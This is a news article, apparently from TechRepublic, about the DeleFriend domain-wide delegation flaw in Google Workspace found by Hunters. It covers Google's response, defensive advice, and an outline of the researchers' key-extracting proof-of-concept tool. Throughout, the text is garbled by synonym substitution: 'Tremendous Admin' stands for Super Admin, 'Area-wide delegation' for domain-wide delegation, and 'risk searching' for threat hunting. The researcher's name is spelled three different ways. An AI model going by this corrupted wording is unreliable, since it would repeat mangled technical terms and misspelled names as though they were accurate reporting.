Hunters researchers famous the vulnerability might result in privilege escalation. Google stated the report “doesn’t determine an underlying safety difficulty in our merchandise.”
Cybersecurity researchers from the agency Hunters found a vulnerability in Google Workspace that might enable undesirable entry to Workspace APIs. The flaw is important in that it might let attackers use privilege escalation to realize entry that may in any other case solely be out there to customers with Tremendous Admin entry. Hunters named this safety flaw DeleFriend.
Leap to:
Vulnerability uncovered in Google’s domain-wide delegation
In line with the Hunters group, the vulnerability relies on Google Workspace’s position in managing consumer identities throughout Google Cloud providers. Area-wide delegation connects id objects from both Google Workspace Market or a Google Cloud Platform Service Account to Workspace.
Area-wide delegation can be utilized by attackers in two primary methods: to create a brand new delegation after having gained entry to a Tremendous Admin privilege on the goal Workspace surroundings by one other assault, or to “enumerate profitable combos of service account keys and OAuth scopes,” Hunters stated. This second approach is the novel methodology the researchers have found. Yonatan Khanashvilli, risk searching knowledgeable at Workforce Axon at Hunters, posted a way more detailed clarification of DeleFriend.
Response from Google
Hunters disclosed this flaw to Google in August 2023 and wrote, “Google is at the moment reviewing the difficulty with their Product group to evaluate potential actions primarily based on our suggestions.”
An nameless Google consultant advised The Hacker Information in November 2023, “This report doesn’t determine an underlying safety difficulty in our merchandise. As a greatest follow, we encourage customers to verify all accounts have the least quantity of privilege potential (see steering right here). Doing so is essential to combating these kind of assaults.”
Why this Google Workspace vulnerability is especially harmful
Hunters stated this vulnerability is especially harmful as a result of it’s long-term (GCP Service account keys would not have expiry dates by default), simple to cover and exhausting to detect. As soon as inside an account with Tremendous Admin privileges, attackers might doubtlessly view emails in Gmail, view somebody’s schedule in Google Calendar or exfiltrate information from Google Drive.
“The potential penalties of malicious actors misusing domain-wide delegation are extreme. As an alternative of affecting only a single id, as with particular person OAuth consent, exploiting DWD with present delegation can influence each id inside the Workspace area,” stated Khanashvili within the press launch.
SEE: Overworked IT professionals in Australian small companies have a number of choices for coping with cyber safety. (TechRepublic)
How one can detect and defend towards DeleFriend
Along with guaranteeing privileges are arrange correctly, as Google notes, IT admins might create every service account in a separate venture if potential, Hunters stated. Different suggestions from Hunters to guard towards DeleFriend exploitation are:
- Restrict OAuth scopes in delegations as a lot as potential, utilizing the precept of least privilege.
- Keep away from administrative scopes resembling https://www.googleapis.com/auth/admin.
- Focus detection engineering and risk searching practices on suspicious delegations and a number of personal key creations over a brief period of time.
- Preserve safety posture and hygiene greatest practices.
Hunters created a proof-of-concept instrument for working the DeleFriend exploitation methodology manually. The instrument works by enumerating GCP Tasks utilizing the Useful resource Supervisor API, iterating and enumerating on GCP Service account assets and venture assets, and investigating particular roles and permissions from there, together with extracting personal key worth from a privateKeyData attribute key (Determine A). The tip result’s a JWT object, which could be exchanged with a short lived entry token to permit entry to Google APIs. Konanshvili’s weblog submit incorporates extra element.
Determine A
The instrument is meant for researchers in an effort to detect misconfigurations, and “improve consciousness round OAuth delegation assaults in GCP and Google Workspace and to enhance the safety posture of organizations that use the Area-Large-Delegation function,” Hunters wrote.
Observe: TechRepublic reached out to Google for extra data.
